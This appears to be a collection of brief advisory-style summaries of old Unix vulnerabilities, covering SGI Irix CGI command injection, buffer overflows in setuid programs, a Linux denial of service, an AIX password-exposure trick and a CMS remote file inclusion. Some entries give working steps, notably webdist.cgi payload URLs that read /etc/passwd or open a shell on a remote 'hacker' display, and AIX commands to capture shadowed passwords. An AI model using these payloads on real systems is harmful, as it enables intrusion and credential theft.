A vulnerability exists in the cgi-bin program 'handler', as included by Silicon Graphics in their Irix operating system. This vulnerability will allow a remote attacker to execute arbitrary commands on the vulnerable host as the user the web server is running as. This can easily result in a user being able to access the system. An attacker can use telnet to send a GET request to the vulnerable host with a command appended to the end of the URL. The command will be executed on the vulnerable host.
The vulnerability is centered around the NLSPATH environment variable. Through exporting the oversized and shell-code including buffer to the environment variable NLSPATH, it is possible to exploit any setuid root program that's based on libc [almost all] and gain root access on the machine.
Linux kernel 2.0.33 is vulnerable to a denial of service attack related to overlapping IP fragments. The bug is not in the handling of them itself, but the action taken when an oversized packet is recieved. A printk function is called containing a variable without any sort of wrapping or protection in function ip_glue. The consequences of this are a serious remote denial of service [ie, reboot of machine].
The snap command is a diagnostic utility for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file. snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.
A vulnerability exists in the webdist.cgi program, as shipped by Silicon Grpahics Inc with the Irix operating system. This vulnerability will allow any remote user to execute arbitrary commands on an affected machine. Commands will be executed with the privileges of the httpd daemon. An example of the exploit is '/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd' or 'http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh'
A vulnerability exists in the cgi-bin program 'wrap', as included with Irix 6.2 from SGI. A failure to validate input results in a vulnerability that allows any remote attacker to view the contents of any world readable directory remotely. This can be used to gain information that may be helpful in carrying out other attacks.
In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access.
A remote file inclusion vulnerability exists in micro cms www.impliedbydesign.com. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a URL in the microcms_path parameter that points to a malicious file on a remote server. The vulnerable server then includes and executes the remote file, resulting in arbitrary code execution on the vulnerable server.
Armidale Software's Yapp Conferencing System is vulnerable to an environment variable related buffer overflow vulnerability in (at least) the Linux version. The consequence of the vulnerability being exploited is a local root compromise. The Yapp Conferencing System client handles environment variables without doing bounds checking, allowing one to overflow a buffer in the 'bbs' executable onto the stack. Using this technique, it is possible to obtain a shell running as the user which Yapp is setuid to (in some cases, root).
SuperProbe is an program supplied with XFree86 that helps determine video hardware. It is shipped with Slackware Linux 3.1 and is installed setuid root. There is an exploitable strcpy buffer overflow in the TestChip() function which allows for a trivial local root compromise.